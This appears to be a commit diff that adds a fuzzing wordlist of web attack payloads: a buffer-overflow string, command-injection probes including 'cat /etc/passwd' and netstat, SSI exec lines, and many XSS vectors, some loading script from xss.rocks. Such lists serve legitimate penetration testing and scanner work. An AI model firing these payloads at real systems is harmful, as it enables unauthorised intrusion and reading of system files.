|
| 1 | +{} |
| 2 | +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
| 3 | +<!--#exec cmd="/test"--> |
| 4 | +/index.html|/test| |
| 5 | +;/test; |
| 6 | +;/test |
| 7 | +;netstat -a; |
| 8 | +;/test; |
| 9 | +|/test |
| 10 | +|/test |
| 11 | +|/test| |
| 12 | +|/test| |
| 13 | +||/test| |
| 14 | +|/test; |
| 15 | +||/test; |
| 16 | +;/test| |
| 17 | +;|/test| |
| 18 | +\n/bin/ls -al\n |
| 19 | +\n/test\n |
| 20 | +\n/test\n |
| 21 | +\n/test; |
| 22 | +\n/test; |
| 23 | +\n/test| |
| 24 | +\n/test| |
| 25 | +;/test\n |
| 26 | +;/test\n |
| 27 | +|/test\n |
| 28 | +|n/test\n |
| 29 | +`/test` |
| 30 | +`/test` |
| 31 | +a);/test |
| 32 | +a;/test |
| 33 | +a);/test; |
| 34 | +a;/test; |
| 35 | +a);/test| |
| 36 | +a;/test| |
| 37 | +a)|/test |
| 38 | +a|/test |
| 39 | +a)|/test; |
| 40 | +a|/test |
| 41 | +|/bin/ls -al |
| 42 | +a);/test |
| 43 | +a;/test |
| 44 | +a);/test; |
| 45 | +a;/test; |
| 46 | +a);/test| |
| 47 | +a;/test| |
| 48 | +a)|/test |
| 49 | +a|/test |
| 50 | +a)|/test; |
| 51 | +a|/test |
| 52 | +;system('cat%20/etc/passwd') |
| 53 | +;system('/test') |
| 54 | +;system('/test') |
| 55 | +%0Acat%20/etc/passwd |
| 56 | +%0A/test |
| 57 | +%0A/test |
| 58 | +%0A/test%0A |
| 59 | +%0A/test%0A |
| 60 | +& ping -i 30 127.0.0.1 & |
| 61 | +& ping -n 30 127.0.0.1 & |
| 62 | +%0a ping -i 30 127.0.0.1 %0a |
| 63 | +`ping 127.0.0.1` |
| 64 | +| /test |
| 65 | +& /test |
| 66 | +; /test |
| 67 | +%0a /test %0a |
| 68 | +`/test` |
| 69 | +$;/test |
| 70 | +<SCRIPT>alert('XSS');</SCRIPT> |
| 71 | +</script><script>alert('XSS');</script><script> |
| 72 | +'';!--"<XSS>=&{()} |
| 73 | +<SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT> |
| 74 | +<IMG SRC="javascript:alert('XSS');"> |
| 75 | +<IMG SRC=javascript:alert('XSS')> |
| 76 | +<IMG SRC=JaVaScRiPt:alert('XSS')> |
| 77 | +<IMG SRC=javascript:alert("XSS")> |
| 78 | +<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> |
| 79 | +<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> |
| 80 | +SRC=
<IMG 6;avascript:alert('XSS')> |
| 81 | +<IMG SRC=javascript:alert('XSS')> |
| 82 | +<IMG SRC=javascript:alert('XSS')> |
| 83 | +<IMG SRC="jav ascript:alert('XSS');"> |
| 84 | +<IMG SRC="jav	ascript:alert('XSS');"> |
| 85 | +<IMG SRC="jav
ascript:alert('XSS');"> |
| 86 | +<IMG SRC="jav
ascript:alert('XSS');"> |
| 87 | +<IMG SRC="  javascript:alert('XSS');"> |
| 88 | +<IMG%0aSRC%0a=%0a"%0aj%0aa%0av%0aa%0as%0ac%0ar%0ai%0ap%0at%0a:%0aa%0al%0ae%0ar%0at%0a(%0a'%0aX%0aS%0aS%0a'%0a)%0a"%0a> |
| 89 | +<IMG SRC=java%00script:alert(\"XSS\")> |
| 90 | +<SCR%00IPT>alert(\"XSS\")</SCR%00IPT> |
| 91 | +<SCRIPT/XSS SRC="http://xss.rocks/xss.js"></SCRIPT> |
| 92 | +<SCRIPT SRC=http://xss.rocks/xss.js?<B> |
| 93 | +<IMG SRC="javascript:alert('XSS')" |
| 94 | +<SCRIPT>a=/XSS/ |
| 95 | +\";alert('XSS');// |
| 96 | +<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> |
| 97 | +<BODY BACKGROUND="javascript:alert('XSS')"> |
| 98 | +<BODY ONLOAD=alert('XSS')> |
| 99 | +<IMG DYNSRC="javascript:alert('XSS')"> |
| 100 | +<IMG LOWSRC="javascript:alert('XSS')"> |
| 101 | +<BGSOUND SRC="javascript:alert('XSS');"> |
| 102 | +<BR SIZE="&{alert('XSS')}"> |
| 103 | +<LAYER SRC="http://xss.rocks/scriptlet.html"></LAYER> |
| 104 | +<LINK REL="stylesheet" HREF="javascript:alert('XSS');"> |
| 105 | +<LINK REL="stylesheet" HREF="http://xss.rocks/xss.css"> |
| 106 | +<STYLE>@import'http://xss.rocks/xss.css';</STYLE> |
| 107 | +<META HTTP-EQUIV="Link" Content="<http://xss.rocks/xss.css>; REL=stylesheet"> |
| 108 | +<STYLE>BODY{-moz-binding:url("http://xss.rocks/xssmoz.xml#xss")}</STYLE> |
| 109 | +<IMG SRC='vbscript:msgbox("XSS")'> |
| 110 | +<IMG SRC="mocha:[code]"> |
| 111 | +<IMG SRC="livescript:[code]"> |
| 112 | +<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> |
| 113 | +<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> |
| 114 | +<META HTTP-EQUIV="Link" Content="<javascript:alert('XSS')>; REL=stylesheet"> |
| 115 | +<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> |
| 116 | +<IFRAME SRC="javascript:alert('XSS');"></IFRAME> |
| 117 | +<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> |
| 118 | +<TABLE BACKGROUND="javascript:alert('XSS')"> |
| 119 | +<DIV STYLE="background-image: url(javascript:alert('XSS'))"> |
| 120 | +<DIV STYLE="background-image: url(javascript:alert('XSS'))"> |
| 121 | +<DIV STYLE="width: expression(alert('XSS'));"> |
| 122 | +<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> |
| 123 | +<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> |
| 124 | +<XSS STYLE="xss:expression(alert('XSS'))"> |
| 125 | +exp/*<XSS STYLE='no\xss:noxss("*//*"); |
| 126 | +<STYLE TYPE="text/javascript">alert('XSS');</STYLE> |
| 127 | +<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> |
| 128 | +<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> |
| 129 | +<BASE HREF="javascript:alert('XSS');//"> |
| 130 | +<OBJECT TYPE="text/x-scriptlet" DATA="http://xss.rocks/scriptlet.html"></OBJECT> |
| 131 | +<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT> |
| 132 | +getURL("javascript:alert('XSS')") |
| 133 | +a="get"; |
| 134 | +<!--<value><![CDATA[<XML ID=I><X><C><![CDATA[<IMG SRC="javas<![CDATA[cript:alert('XSS');"> |
| 135 | +<XML SRC="http:/xss.rocks/xsstest.xml" ID=I></XML> |
| 136 | +<HTML><BODY> |
| 137 | +<SCRIPT SRC="http://xss.rocks/xss.jpg"></SCRIPT> |
| 138 | +<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://xss.rocks/xss.js></SCRIPT>'"--> |
| 139 | +<? echo('<SCR)'; |
| 140 | +<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>"> |
| 141 | +<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- |
| 142 | +<SCRIPT a=">" SRC="http://xss.rocks/xss.js"></SCRIPT> |
| 143 | +<SCRIPT a=">" '' SRC="http://xss.rocks/xss.js"></SCRIPT> |
| 144 | +<SCRIPT "a='>'" SRC="http://xss.rocks/xss.js"></SCRIPT> |
| 145 | +<SCRIPT a=`>` SRC="http://xss.rocks/xss.js"></SCRIPT> |
| 146 | +<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="xss.rocks/xss.js"></SCRIPT> |
0 commit comments